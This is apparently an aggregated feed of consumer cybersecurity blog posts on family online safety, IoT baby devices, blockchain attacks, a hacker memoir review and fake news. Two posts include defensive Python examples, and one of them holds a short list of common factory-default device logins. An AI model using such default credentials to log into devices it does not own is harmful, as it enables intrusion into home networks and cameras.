When managed properly, gaming can be a terrific activity that provides some genuine benefits for players. Research shows it can help manage anxiety and depression, reduce pain and even help improve the memory and resilience of players. It can also provide terrific opportunities for social interactions by breaking down the barriers of physical social groups. Sounds idyllic, doesn’t it!!

Parents Concerned About Risks With Gaming

Despite our offspring assuring us otherwise, the majority of us parents do realise that there are some potential dangers associated with gaming. Two-thirds of us (65%) believe our kids are at risk of online grooming. 68% of us are concerned about cyberbullying and 58% worry that our children will become the victim of a cybercriminal’s scam.

What Are Parents Doing To Manage Risks of Online Gaming?

As first generation digital parents, we have a tough gig. Many of us are furiously trying to get our own heads around the constantly changing digital world without any intel from previous generations. Meanwhile, we need to be educating our kids about the challenges and pitfalls of the online world. It’s a big task!

Many parents do an amazing job but unfortunately, not all of us are taking the necessary steps to protect our kids and teach them how to navigate the challenges. According to the research:

  • almost 1 in 5 parents (18%) never monitor what their children are doing online;
  • 32% of parents do not follow the age ratings of games; and
  • 86% of parents allow their children to play online games recommended for older children.

This is despite the fact that many of us worry that our children will be exposed to violence, sex, drugs and gambling according to the research.

How Can We Protect Our Kids While Playing Video Games

It’s clearly one of the most popular hobbies for Aussie tweens and teens, so our job as parents is to ensure our kids are gaming as safely as possible. Here is my advice on the steps you should take to protect your kids:

  • Start Conversations Early

If you start talking about ways to game safely early, it will make your job that much easier when your children get older. If your kids are young, start with simple rules like: “don’t open messages from people you don’t know” and “decline friend requests from strangers.” You want online safety to be part of normal behaviour.

  • Be Careful What You Click

Most children have been using digital devices for entertainment from an early age, which desensitises them to the potential risks of online behaviour. Cybercriminals can use the popularity of video games to entice gamers to click on potentially malicious links. Think about what you are clicking on and ensure that it’s from a reliable source.

  • Control How Long They Play

Set a good example by minimising your use of devices around the home. Why not invest in parental control software to set time limits on your child’s device usage? Not only will you be reducing their exposure to potentially malicious or inappropriate websites, but they will probably get more homework done!

  • Avoid Malicious Links

If your children are searching online for gaming tips or new games to download, a tool like McAfee WebAdvisor can help them avoid dangerous websites and links, and will warn them if they do accidentally click on something malicious.

  • Be Protected

No matter what anyone in the family is doing online, invest in a security product like McAfee Total Protection that can help keep connected devices safe from malware. Just like any PC application, be sure to keep security software updated.

Responsible Gaming Could Actually Prepare Your Child for Their Career

In my opinion, parenting is all about preparing your child for their adult life. And a big part of that is ensuring they are employable. So, before you crack down too harshly on your child’s gaming habits consider this. A recent report by McAfee, entitled Winning The Game, identified that gamers have a skills set that may help fill the current and future demand for cyber security experts. Whether it’s cracking systems, avoiding counter attacks or deciphering codes, these gaming skills were nominated by almost 1000 cyber security professionals as easily transferable to a security professional role.

So, let your kids keep playing but absolutely minimise the risks. Introduce time limits, ensure a game is suitable and teach your kids how to navigate the challenges. That way, if they end up with an illustrious career in cybersecurity, you can take all the credit!!

Take care,

Alex xx

The post Teens, Gaming and Risk appeared first on McAfee Blogs.

Vacation Checklist: 5 Easy Ways to Help Secure Your Family’s Devices When Traveling

With this writing, we’re joyfully en route to a much-anticipated Florida vacation. A sneak peek into our car — and the thousands of other cars headed south on Interstate 4 — offers a reflection of family life today. Mom has her earbuds on and is listening to her newest audiobook, Dad is nodding along with his favorite podcaster over the car stereo, and the teenager in the back seat is making faces into her phone for her Snapchat pals.

Can we get through this vacation without our faces planted in our phones? Can we find ways to unplug more and plug into the moment? That’s certainly our plan. However, each one of us will have to rely on his or her tech from time to time. Frankly, who doesn’t these days?

Our Tech Reality

It’s nearly impossible to vacation minus our electronics, but we’ve agreed to unplug for several reasons. The first reason, of course, is the goal of being present and enjoying our time together. The second reason we want to limit our tech use while traveling is safety. Nothing has the power to obliterate a family vacation faster than stolen data, credit card info, or devices.

5 tips for a more secure family vacation

  1. Keep devices protected and close. Device theft season is upon us. And, distracted vacationers are the perfect target. So, make sure your smartphone is password protected, security settings are tuned up, and screen lock is on. Keep your phones, tablets, laptops, and handheld gaming devices on your person or locked in a hotel safe when you are away. And, leave at home any electronic equipment you don’t need during your trip.
  2. Turn on Find My Phone. This is a bigger deal than you might guess. No one plans on losing a phone, but hey, it happens. Have the “don’t lose your phone” conversation with your kids several times but back that up by having everyone in the family turn on his or her lost phone app just in case. Consider an extra layer of protection on mobile devices with mobile security software.
  3. Be cautious when using public Wi-Fi. If you need to send an email or photos, or want to preserve your family’s data plan by jumping on the hotel’s public Wi-Fi while on vacation, make sure that Wi-Fi is secure and attached to a trusted source. Ask for the establishment’s Wi-Fi and log on to that exact name. Hackers can easily create fake hotspots (called faux towers) with similar names. Also, if you aren’t actively using a hotspot, turn off your Wi-Fi setting as well as the “auto-join” setting so that your device is not visible to others. Consider shutting off your Bluetooth setting as well. To be extra sure of security, two tips from the Federal Communications Commission: While using a public Wi-Fi network, periodically adjust your phone settings to forget the network, then log back in again. And, if you want to assess the network’s security, try purposely logging onto the public Wi-Fi using the wrong password. If you can get on anyway, that’s a sign that the network is not secure. The best way to stay safe while traveling may be a Virtual Private Network or VPN. According to one McAfee study, when it comes to Wi-Fi security specifically, 58% of survey respondents know how to check if a Wi-Fi network is secure and safe to use, but less than half (49%) take the time to ensure their connection is secured. Be aware and don’t be in that latter percent.
  4. Keep software updated. Before you travel, check for any software updates on your devices. Updates often fix security bugs and seal up cracks in the system. Add another layer of protection by safeguarding your devices with security software.
  5. Avoid accessing financial data. It’s a good idea to get your banking in order before you leave for vacation. Trying to move funds from one account to another or even check your balance can open you up to hackers if you have to do so on a public network.

One of the most significant ways you can secure your family vacation is adopting a mindset of awareness. We get excited while on vacation. We want to send those pictures, transfer that money, or get that email out of the way. Very few of us — especially our kids — are concerned about cyber crooks and thieves trying to ransack our well-laid vacation plans. With a few extra minutes invested into your travel plans, you can thoroughly enjoy your family time.


Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures).

The post Vacation Checklist: 5 Easy Ways to Help Secure Your Family’s Devices When Traveling appeared first on McAfee Blogs.

Threat Report: Don’t Join Blockchain Revolution Without Ensuring Security

On May 19 researchers discovered a series of vulnerabilities in the blockchain-based EOS platform that can lead to remote control over participating nodes. Just four days prior, a mining pool server for the IoT platform HDAC was compromised, impacting the vast majority of miners. In January the largest-ever theft of cryptocurrencies occurred against the exchange Coincheck, resulting in the loss of US$532 million in NEM coin. Due to its increased popularity and profitability, cybercriminals have been targeting all things blockchain. McAfee Advanced Threat Research team analysts have now published the McAfee Blockchain Threat Report to explain current threats against the users and implementers of blockchain technologies.

What is Blockchain?

Even if you have not heard of blockchain, you have likely heard of cryptocurrencies, namely Bitcoin, the most popular implementation. In late 2017 Bitcoin reached a value of $20,000 per coin, prompting a lot of interest in the currency—including from cybercriminals. Cryptocurrencies are built on top of blockchain, which records transactions in a decentralized way and enables a trusted “ledger” between trustless participants. Each block in the ledger is linked to the next block, creating a chain. Hence, the system is called a blockchain. The chain enables anyone to validate all transactions without going to an outside source. From this, decentralized currencies such as Bitcoin are possible.

Proof-of-work blockchain. Source: https://bitcoin.org/bitcoin.pdf.

Blockchain Attacks

Attackers have adopted many methods targeting consumers and businesses. The primary attack vectors include phishing, malware, implementation vulnerabilities, and technology. In a phishing scheme in January, Iota cryptocurrency users lost $4 million to scams that lasted several months. Malware authors often change their focus: from late 2017 to early 2018 some migrated from deploying ransomware to cryptomining. They have been found using open-source code such as XMRig for system-based mining and the mining service Coinhive.

Source: McAfee Labs

Implementation vulnerabilities are the flaws introduced when new technologies and tools are built on top of blockchain. The recent EOS attack is one example. In mid-July 2017 Iota suffered an attack that essentially enabled attackers to steal from any wallet. Another currency, Verge, was found with numerous vulnerabilities. Attackers exploiting the vulnerabilities were able to generate coins without spending any mining power.

Known attacks against the core blockchain technology are much more difficult to implement, although they are not unheard of. The most widely known attack is the 51% attack, or majority attack, which enables attackers to create their own chains at will. The group 51 Crew targeted small coins, including Krypton, and held them for ransom. Another attack, known as a Sybil attack, can allow an attacker to completely control a targeted victim’s ledger. Attempts have been made at larger-scale Sybil attacks, such as one in 2016.

Dictionary Attacks

Blockchain may be a relatively new technology, but that does not mean that old attacks cannot work. Mostly due to insecure user behavior, dictionary attacks can succeed against some implementations of blockchain. Brain wallets, or wallets based on weak passwords, are insecure, yet people still use them. These wallets are routinely stolen, as was the case with the nearly BTC60 stolen from the following wallet:

This wallet recorded two transactions as recently as March 5, 2018. One incoming and one outgoing transaction occurred within roughly 15 minutes. Source: https://blockchain.info.

Exchanges Under Attack

The biggest players, and targets, in blockchain are cryptocurrency exchanges. Cryptocurrency exchanges can be thought of as banks in which users create accounts, manage finances, and even trade currencies, including traditional ones. One of the most notable incidents is the attack against Mt. Gox between 2011‒2014 that resulted in $450 million of Bitcoin stolen and led to the liquidation and closure of the company. Coincheck, previously mentioned, survived the attack and began reimbursing victims for their losses in March 2018. Not all recent exchanges fared so well. Bitcurex abruptly closed, leading to an official investigation into the circumstances; Youbit suffered two attacks, leading the company into bankruptcy.

An advertisement for the shuttered Polish exchange Bitcurex.

Conclusion 

Blockchain technologies and their users are heavily targeted by profit-driven cybercriminals. Current attackers are changing their tactics and new groups are entering the space. As more businesses look to blockchain to solve their business problems and consumers increasingly rely on these technologies, we must be diligent in understanding where the threats lie to achieve proper and tailored risk management. New implementations must place security at the forefront. Cybercriminals have already enjoyed successes against the users and implementations of blockchain, so we must prepare accordingly.

The post Threat Report: Don’t Join Blockchain Revolution Without Ensuring Security appeared first on McAfee Blogs.

#CyberAware: 4 Actionable Steps to Boost Your Family’s Safety Online

Summer has officially rolled out its welcome mat. But as most parents might be thinking about slowing down, for most kids, summer is when digital device use goes into overdrive. That’s why June — which also happens to be Internet Safety Month — is a perfect time to strengthen your family’s digital readiness.

Good news: This digital safety skills booster is quick and actionable. And who knows — if a few of these tips boost your family’s safety, you may have just saved summer for everyone!

4 Ways to Boost Family Safety Online 

Practice safe social. Challenge your family to rein in its social footprint by taking these specific actions: 1) Adjust privacy settings on all social networks. 2) Trim friend and follower lists. 3) Delete any personal data on social profiles such as birthdate, address, or school affiliation. 4) Edit and limit app permissions. As we’ve just seen in the headlines, the misuse of personal data is a very big deal. 5) Share with care. Routinely scrolling, liking, and commenting on social sites such as Snapchat and Instagram can give kids a false sense of security (and power). Remind tweens and teens to share responsibly. Oversharing can damage a reputation, and words or images shared callously can damage other people.

Practice safe gaming. Summertime is a gamer’s heaven. Endless battles and showdowns await the dedicated. However, some digital pitfalls can quickly douse the fun. According to the National Cyber Security Alliance’s gaming tip sheet, safe gaming includes: updating gaming software, protecting devices from malware, protecting your child’s personal data, using voice chat safely, and paying close attention to content ratings.

Practice strong security. There are some steps only a parent can take to safeguard the family online. 1) Parental controls. Filtering software blocks inappropriate websites and apps as well as establishes boundaries for family tech use. 2) Comprehensive security software helps protect your PCs, tablets, and devices from viruses, malware, and identity theft. 3) Keeping your guard up. According to McAfee’s Gary Davis, staying safe online also includes digital habits such as using strong passwords, boosting your network security and firewall, and being aware of the latest scams that target consumers.

Practice wise parenting. 1) Know where kids go. Know which apps your kids love and why, how they interact with others online, and how much time they spend online. 2) Unplug. Establish tech-free family activities this summer. Powering off and plugging into quality time is the most powerful way to keep your family safe online. A strong relationship empowers responsibility. 3) Be confident. As parenting expert Dr. Meg Meeker says, parents should be parenting from a place of confidence rather than from a place of fear. “The temptation for parents is to think that they have no control over what their child does online. This isn’t true,” says Meeker. “Parents, you are in control of your child’s technology use; it is not in control of you.”


Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures).

The post #CyberAware: 4 Actionable Steps to Boost Your Family’s Safety Online appeared first on McAfee Blogs.

High-Tech & Hackable: How to Safeguard Your Smart Baby Devices

It’s just about as creepy as it gets: a hacker breaking into a smart device in your baby’s nursery. The Internet of Things (IoT) has wrapped our homes in technology, which means any connected piece of technology you own, be it a smartphone, a thermostat, or even a baby toy or monitor, is fair game for hackers.

High-tech products geared toward parents of newborns and young kids are on the rise. Reports show that new parents are fueling this industry, purchasing smart diapers, onesies, baby monitors, digital bassinets, soothers, high-tech swings, breathing monitors, play pads, and a string of smart toys. Parents buying baby tech and digital toys are counting on fresh products to increase efficiency and maintain a constant connection to their kids.

But these seemingly efficient products, some argue, could in some cases be increasing parents’ stress. Are these products, which are also highly hackable, worth the risk and worry?

The Pros

Peace of mind, safety. Smart baby devices give anxious parents added peace of mind. Who doesn’t want to see their sweet baby deep in sleep and go to bed without worry? Given the chance, many parents welcome the opportunity to know their baby’s temperature, oxygen levels, heartbeat, and breathing are on track.

Remote monitoring, convenience. Being able to check on a sleeping baby from downstairs, the yard, or the home gym is an incredible convenience that many parents welcome as a productivity booster.

Learning and development. Many parents purchase smart devices for kids in an effort to help them stay on track developmentally and ensure they are prepared for the tech-driven world they are heading into.

The Cons

Hackable. Any device that is web-enabled or connects to the cloud can be hacked, which creates a whole new set of issues for a family. If you are getting sleeping, breathing, and health data on your child, anyone who compromises the device, its app, or its cloud account could be getting that same information.

False readings. Baby technology, as useful as it appears, can also have glitches that medical professionals argue can be more harmful than helpful. Can you imagine waking up at 2 a.m. to a monitor alarm that falsely says your baby isn’t breathing?

Complex, pricey. Some of the products can be complicated to program and set up and pricey to purchase or replace.

So why would a hacker even want to break into a baby monitor, you may ask? For some, the motive is simply that they can: intercepting data, crashing a device, or proving their digital know-how is part of a hacker’s reward system. For others, the motive is far more nefarious, such as stalking your family’s activities or talking to your kids in the middle of the night.

Tips to safeguard baby tech:

Think before you purchase. Before buying baby tech, evaluate each item’s usefulness. Ask yourself: Do I need this piece of technology? Will this product decrease or increase my stress? If a product connects to Wi-Fi or the cloud, weigh its convenience against the risk to your family’s data.

Change default passwords. Many products ship with easy-to-guess default passwords that many consumers never change, and that habit makes breaking in trivial: default credentials are printed in manuals and collected in public lists, so a web search for the brand name is often all an attacker needs. A compromised device can also expose the Wi-Fi password stored on it, handing the attacker the whole home network.

Buy from known brands. Buy from reputable manufacturers and vendors, and search for whether that company’s products have ever been compromised. And although it’s tempting to buy a device second-hand to save a little money, used technology might have malware installed on it, so be wary and at the very least reset it to factory settings before putting it in the nursery.

Update software, use strong passwords. If there’s a software update alert for your baby tech, take the time to update immediately, choose a password of at least 16 characters, and never use the same password for more than one device.

Turn off. A device that is powered off cannot be attacked over the network, so even with all the safeguards in place, remember to switch off devices that are not in use for that last layer of protection.
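The password advice above (change factory defaults, use at least 16 characters, never reuse a password across devices) can be turned into a quick audit of the smart devices in the house. The Python below is an added example written for this article, not McAfee's code or any vendor's tool; the default-credential list, the inventory format and the entropy threshold are assumptions made for the example.

```python
import math
import secrets
import string

# Constructed sample of factory-default credentials of the kind printed in
# device manuals and collected in public lists; the pairs are illustrative,
# not taken from any particular product.
KNOWN_DEFAULTS = {
    ("admin", "admin"),
    ("admin", "password"),
    ("admin", "1234"),
    ("admin", "12345"),
    ("root", "root"),
    ("user", "user"),
}

SYMBOLS = string.punctuation  # 32 printable ASCII symbols


def is_default_credential(username: str, password: str) -> bool:
    """True if the pair is a published factory default (username case-insensitive)."""
    return (username.lower(), password) in KNOWN_DEFAULTS


def entropy_bits(password: str) -> float:
    """Rough strength estimate: length x log2(size of the character classes used).

    This is an upper bound (it ignores dictionary words and keyboard patterns),
    so a low score is reliable evidence of weakness while a high score is only
    a necessary condition for strength.
    """
    charset = 0
    if any(c.islower() for c in password):
        charset += 26
    if any(c.isupper() for c in password):
        charset += 26
    if any(c.isdigit() for c in password):
        charset += 10
    if any(c in SYMBOLS for c in password):
        charset += len(SYMBOLS)
    return len(password) * math.log2(charset) if charset else 0.0


def meets_policy(password: str, min_length: int = 16, min_bits: float = 80.0) -> bool:
    """The article's 16-character floor plus an entropy floor (80 bits is an assumption)."""
    return len(password) >= min_length and entropy_bits(password) >= min_bits


def generate_password(length: int = 20) -> str:
    """Random password drawn from the CSPRNG behind `secrets`, guaranteed to contain
    at least one character from every class so that meets_policy() accepts it."""
    if length < 16:
        raise ValueError("the article's floor is 16 characters")
    classes = [string.ascii_lowercase, string.ascii_uppercase, string.digits, SYMBOLS]
    alphabet = "".join(classes)
    while True:
        candidate = "".join(secrets.choice(alphabet) for _ in range(length))
        if all(any(c in cls for c in candidate) for cls in classes):
            return candidate


def find_reuse(device_passwords: dict) -> dict:
    """Map each password that protects more than one device to the devices sharing it."""
    by_password = {}
    for device, password in device_passwords.items():
        by_password.setdefault(password, []).append(device)
    return {pw: devices for pw, devices in by_password.items() if len(devices) > 1}


def audit(device_credentials: dict) -> list:
    """Return findings for a {device: (username, password)} inventory.

    The inventory format is an assumption of this example."""
    findings = []
    for device, (user, password) in device_credentials.items():
        if is_default_credential(user, password):
            findings.append(f"{device}: factory default credentials still in use")
        elif not meets_policy(password):
            findings.append(f"{device}: password is too weak ({entropy_bits(password):.0f} bits)")
    passwords_only = {d: p for d, (_, p) in device_credentials.items()}
    for _, devices in find_reuse(passwords_only).items():
        findings.append("same password reused on: " + ", ".join(devices))
    return findings


if __name__ == "__main__":
    # Constructed inventory: one device on defaults, two sharing a weak password.
    inventory = {
        "baby monitor": ("admin", "admin"),
        "nursery camera": ("admin", "Summer2018!"),
        "router": ("admin", "Summer2018!"),
    }
    for finding in audit(inventory):
        print(finding)
    print("suggested replacement:", generate_password())
```

The entropy figure is deliberately generous, which is why the audit treats it only as a way to reject passwords; the real defence against the "google the brand for its password" attack is the default-credential check, and the reuse check is what stops one compromised device from unlocking the rest.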

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures).

The post High-Tech & Hackable: How to Safeguard Your Smart Baby Devices appeared first on McAfee Blogs.

How to Steal a Million: The Memoirs of a Russian Hacker

As a university researcher specializing in cybercrime, I've had the opportunity to watch the Russian carding market closely and write about it frequently on my blog "Cybercrime & Doing Time." Sometimes this leads to interactions with the various criminals that I have written about, which was the case with Sergey. I was surprised last January to be contacted and to learn that he had completed a ten-year prison sentence and had written a book. I have to say, I wasn't expecting much. This was actually the third time a cybercriminal had tried to get my interest in a book they had written, and the first two were both horrible and self-promotional. I agreed to read his first English draft, which he sent me in January 2017.

I was absolutely hooked from page 1.  As I have told dozens of friends since then, his story-telling vehicle is quite good.  The book starts with him already in prison, and in order to teach the reader about carding and cybercrime, a lawyer visits him periodically in prison, providing the perfect foil  needed to explain key concepts to the uninitiated, such as interrupting one of Sergey's stories to ask "Wait.  What is a white card?"
My copy of the book!

As someone who has studied cybercrime for more than 20 years, I was probably more excited than the average reader will be to see so many names and criminal forums and card shops that I recognized -- CarderPlanet, and card shop runners such as Vladislav Khorokhorin AKA BadB, Roman Vega AKA Boa, and data breach and hacking specialists like Albert Gonzalez and Vladimir Drinkman who served as the source of the cards that they were all selling.  These and many of the other characters in this book appeared regularly in this blog.  (A list is at the bottom of this article)

Whether these names are familiar to the reader or not, one can't help but be drawn into this story of intrigue, friendship, and deception as Pavlovich and his friends detect and respond to the various security techniques that shopkeepers, card issuers, and the law enforcement world are using to try to stop them. Sergey shows how a criminal can rise quickly in the Russian cybercrime world through the face-to-face networking that a $100,000 per month income can provide, jet-setting the world with his fellow criminals and using business air travel, penthouse hotel suites, cocaine and women to loosen the lips of his peers so he can learn their secrets, but he also shows how quickly these business relationships can shatter in the face of law enforcement pressure.

The alternating chapters of the book serve as a stark reminder of where such life choices lead, as Sergey reveals the harsh realities of life in a Russian prison. Even these are fascinating, as the smooth-talking criminal does his best to learn the social structure of Russian prison and find a safe place for himself on the inside. The bone-crushing beatings, deprivation of food and privacy, and the fear of never knowing which inmate or prison guard will snap next in a way that could seriously harm or kill him are a constant reminder that eventually everyone gets caught and when they do, the consequences are extreme.

Sergey's original English manuscript has been greatly improved with the help of feedback from pre-readers and some great editors. After my original read, I told Sergey "I LOVE the story delivery mechanism, and there are fascinating stories here, but there are a few areas that really need some work."  It's clear that he took feedback like this seriously.  The new book, released in May 2018, is markedly improved without taking anything away from the brilliant story-telling of a fascinating criminal career ending with a harsh encounter with criminal justice.

A purchase link to get the book from Amazon: How to Steal a Million: The Memoirs of a Russian Hacker

The book was extremely revealing to me, helping me to understand just how closely linked the various Russian criminals are to each other, as well as revealing that some brilliant minds, trained in Computer Science and Engineering, and left morally adrift in a land where corruption is a way of life and with little chance of gainful employment, will apply those brilliant minds to stealing our money.

I seriously debated whether I should support this book. Many so-called "reformed" criminals have reached out to me in the past, asking me to help them with a new career by meeting with them, recommending their services, or helping them find a job. It is a moral dilemma. Do I lend assistance to a man who stole millions of dollars from thousands of Americans? Read the book. To me, the value of this book is that it is the story of a criminal at the top of his game, betrayed by his colleagues and getting to face the reality of ten years in a Russian prison. I think the book has value as a warning: "a few months or even a couple of years of the high life is not worth the price you will pay when it all comes crashing down."

Links to selected blog articles that feature Pavlovich's cast of characters:

May 12, 2008 TJX and Dave and Busters - Maksym Yastremskiy (Maksik), Aleksandr Suvorov (JonnyHell) and Albert Gonzalez (Segvec) and their role in the TJX data breach.

August 5, 2008 TJX Reminder: We Will Arrest You and We Will Send You To Jail - some of the legal aftermath of the case above.

August 8, 2008 TJX: the San Diego Indictments where the US government indicts:
  • SERGEY ALEXANDROVICH PAVLOVICH, aka Panther, aka Diplomaticos, aka PoL1Ce Dog, aka Fallen Angel, aka Panther757
  • DZMITRY VALERYEVICH BURAK, aka Leon, aka Graph, aka Wolf
  • SERGEY VALERYEVICH STORCHAK, aka Fidel
and charges them with violation of "18 USC Section 1029(b)(2) Conspiracy to Traffic Unauthorized Access Devices"

May 9, 2013 ATM Cashers in 26 Countries Steal $40M talks about BadB's role in "Unlimited" ATM cash-out schemes, and his arrest in 2010 and sentencing to 88 months in 2013.

Jan 14, 2014 Target Breach Considered in Light of Drinkman/Gonzalez Data Breach Gang talked about Albert Gonzalez, Vladimir Drinkman, and how there seemed to be such a strong pattern of behavior - a script, if you will - to how criminals were conducting the major data breaches of that time.

Jan 27, 2014 Roman Vega (CarderPlanet's BOA) Finally Gets His Sentence addressed the plight of Roman Vega, who had been drifting around in the American criminal justice system, unsentenced, from 2003 until 2013! Dmitry Golubov AKA Script, the "godfather of CarderPlanet" is also discussed in this post.



STOP FAKE NEWS – PAUSE, EVALUATE and FORWARD


The potential for fake news to go viral on social media is quite real. There have been several instances where rumours have incited mob violence between rival communities. The consequences got out of hand when illiterate tribal villagers in a remote Indian district received a WhatsApp message claiming that a gang was kidnapping children and selling their body parts. The message went viral in these villages and mobs of up to 500 people pounced on strangers they suspected of being the child kidnappers; in all, seven people were lynched in two incidents.
It is quite apparent to every cybercitizen that fake or distorted news is on the rise. Social media gives every individual a platform to disseminate such news or information. Fake news is routinely posted for vested interests such as political distortion, defamation, mischief, inciting trouble, and settling personal scores.

As aptly illustrated by the case above, when fake news goes viral the ill effects can escalate to physical damage, loss of life, or long-term animosity between sections of society. Purposely crafted fake or distorted news introduced over time by vested interests can distort perspectives and social harmony, and is effectively used for ideological indoctrination.

Creation of fake news is extremely simple. Listed below are six commonly used methods:

·         Individuals concoct their own stories

·         Marketers release competitive advertisements based on unproven data

·         Groups with vested interests manipulate the volume and narrative of news.

·         Photographs are morphed

·         Old photographs are used to depict recent events

·         Real photographs are used to defame

It is also often quite easy to trace the perpetrator. A few years back, a Twitter hoax was dealt with by a strong reprimand, but not today: fake news, hoaxes, rumours, or any other content that results in incitement or defamation now attract stronger penalties and jail terms, and police are more aware and vigilant.
Most cybercitizens unwittingly help fake news go viral by recirculating it. Each forward creates a sense that the story must be true, because the previous person must surely have validated it before sending it on.

Pause before forwarding, Evaluate veracity and then Forward. Do not be that link in the chain responsible for the circulation of Fake News
Cybercitizens, take care when crafting messages on social media: a little mischief may earn you a few years in government-paid accommodation, namely jail. Advise your children to be responsible and to cross-check news received over social media before recirculating or believing it.

Twelve Commandments that will never fail to Keep You Cyber Safe Online

As the digital world explodes with new online services, cyber threats have become more ingenious and dangerous and have spawned multiple variants and types. As each new threat makes the headlines, the accompanying set of threat-specific security recommendations confuses cybercitizens, who want a comprehensive list of recommendations that does not change frequently.

There are twelve foundational security practices that will help keep you and your family safe. Practicing them will harden your defenses against cybercrime and also reduce the negative effects of social media use.

1)    Thou shalt not use a device with pirated software
Pirated software is usually not patched, because it cannot receive updates from the vendor. Unpatched software has security vulnerabilities which can be easily exploited to steal data and credentials.

2)    Thou shalt not use a device which is not set for automatic updates of Operating System patches
Automatic patching for personal devices is the best way to ensure that the latest security patches are applied and security loopholes closed before cybercriminals can get to them

3)    Thou shalt not use a device without updated antimalware (antivirus) software installed
Antimalware software reduces the probability of a malware infection (e.g. ransomware) on your device. For it to be effective to catch the latest malware variants, it has to be automatically updated with the latest updates.

4)    Thou shalt not download pirated movies, games and other such material
Something free may turn out to be expensive, both financially and to your reputation. Malware is often bundled with pirated content or applications.

5)    Thou shalt not use a site without trying to verify its authenticity
The lock icon and the digital certificate behind it show that the connection is encrypted and that the certificate was issued for the domain in the address bar. That is not proof of legitimacy: a lookalike domain can obtain a perfectly valid certificate too, so check that the domain itself is the one you expect. While not foolproof, this reduces the chance of landing on a spoofed site designed to steal your credentials.

6)    Thou shall not ignore inappropriate content on social networks, always report or dislike it
Inappropriate content influences the minds of our children as they stumble upon it online. Hate content in particular may induce biases which take a long time to reverse.

7)    Thou shalt not indulge in or encourage cyber bullying online
A parent or teacher has the additional responsibility of guiding children on the right online behavior. You do not want your children to bully or be bullied

8)    Thou shalt not use passwords that can be easily guessed and promise to  keep the password a secret
Try to choose complex passwords, do not reuse them on multiple sites and always store them securely. The easiest way to get into your online accounts is by stealing your passwords

9)    Thou shalt not be tempted by fraudulent emails promising financial windfalls, miracle cures or cheap medicines
Try to check the authenticity of the email. Electronic communication is easily manipulated, as it is difficult to verify the authenticity of the sender. Scams like these can cost you money and affect your health.

10) Thou shall not forsake your responsibility of helping your older parents or young kids to be safe as they use the internet
Be a guide and easily available as both old and young learn to use the internet and face cyber risks. Being available, requires that you can be reached for instant advice on problems they encounter

11) Thou shalt never trust a stranger blindly online
Always be suspicious when dealing with online strangers, and never let down your guard at any point in the relationship. The identity of an online persona cannot be easily verified, but it can be easily faked. Online friends sometimes have the vilest of intentions, which can lead to all forms of blackmail, particularly if they have obtained incriminating pictures and videos. Besides adults, young children are potential victims.

12) Thou shalt not set a weak password for your mobile phone or keep it unlocked
A stolen phone with an easy to guess password or if unlocked, is a sure invitation into all your signed in accounts and personal data. A large number of phones are left unattended or lost each year.
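Commandment 5 says the lock icon and its certificate are not foolproof. The reason is that the padlock answers only one question: does the certificate presented match the name in the address bar? The Python below, an added example that is not part of the original article, implements that name-matching rule the way browsers do and then asks the separate question the padlock cannot answer, whether the name is a lookalike of a brand you trust. The trusted domain examplebank.com, the homoglyph table and the two-label registrable-domain shortcut are assumptions of the example.

```python
from typing import Optional


def _labels(name: str) -> list:
    """Lower-case DNS labels of a name, ignoring a trailing dot."""
    return name.lower().rstrip(".").split(".")


def hostname_matches(hostname: str, san_names: list) -> bool:
    """Does `hostname` match one of the certificate's DNS subjectAltNames?

    Follows the RFC 6125 / browser rules: comparison is case-insensitive, a
    wildcard is honoured only as the whole leftmost label, it matches exactly
    one label, and it is rejected for a bare two-label name such as *.com.
    """
    if "*" in hostname:
        return False  # the name the user typed must be literal
    host = _labels(hostname)
    for san in san_names:
        pattern = _labels(san)
        if len(pattern) != len(host):
            continue  # a wildcard never spans additional labels
        if any("*" in label for label in pattern[1:]):
            continue  # wildcard only allowed in the leftmost label
        if pattern[0] == "*":
            if len(pattern) < 3:
                continue  # *.com would cover every .com site
            if host[1:] == pattern[1:]:
                return True
        elif "*" in pattern[0]:
            continue  # partial wildcards (f*.example.com) rejected, as browsers do
        elif pattern == host:
            return True
    return False


# Digit-for-letter substitutions commonly used in lookalike domains (assumption:
# a small table is enough for the example; real tooling uses a fuller confusables list).
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "|": "l"})


def registrable_domain(hostname: str) -> str:
    """Naive: the last two labels. A real check consults the Public Suffix List
    (assumption: no multi-part suffixes such as co.uk in the sample data)."""
    return ".".join(_labels(hostname)[-2:])


def lookalike_of(hostname: str, trusted_domains: set) -> Optional[str]:
    """If `hostname` is not one of the trusted domains but contains a trusted brand
    name (after folding digit swaps and hyphens), return the domain it imitates."""
    if registrable_domain(hostname) in trusted_domains:
        return None
    folded = hostname.lower().translate(HOMOGLYPHS).replace("-", "")
    for domain in trusted_domains:
        brand = domain.split(".")[0]
        if brand in folded:
            return domain
    return None


def padlock_verdict(hostname: str, san_names: list, trusted_domains: set) -> dict:
    """Separate the two questions a user tends to conflate when they see a padlock."""
    return {
        "certificate_matches_address_bar": hostname_matches(hostname, san_names),
        "imitates": lookalike_of(hostname, trusted_domains),
    }


if __name__ == "__main__":
    trusted = {"examplebank.com"}
    # Constructed phishing host presenting its own, perfectly valid, certificate.
    print(padlock_verdict("examp1ebank-login.example",
                          ["examp1ebank-login.example"], trusted))
    print(padlock_verdict("www.examplebank.com", ["*.examplebank.com"], trusted))
```

Both hosts get a padlock, because both certificates match the name in the address bar; only the second answer to the verdict tells them apart, and that answer depends on the reader knowing which domain the bank actually uses.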



Cybercrime Surges in Q3

PandaLabs’ Q3 report indicates that cybercrime continues to increase, with 18 million new malware samples captured this quarter, roughly 200,000 a day.

The Quarter at a Glance

Cybercrime continues to grow rapidly, fuelled by the opportunity for large financial rewards.

Attackers have taken to developing new variants of successful ransomware families such as Locky, and to a model known as Ransomware-as-a-Service (RaaS): developers build the ransomware and hand it to distributors, who target and infect victims, with both parties sharing the proceeds.

Another key development was the scale of DDoS attacks, most notably the one against security journalist Brian Krebs. Krebs’ exposure of the vDOS booter service led to the arrest of its operators and subsequently made his site the target of a massive DDoS attack, after which Google’s Project Shield stepped in to bring the site back online. In one of the largest attacks of its kind at the time, the attackers leveraged compromised IoT devices to direct 620 Gbps (gigabits per second) of traffic at the site at its peak.

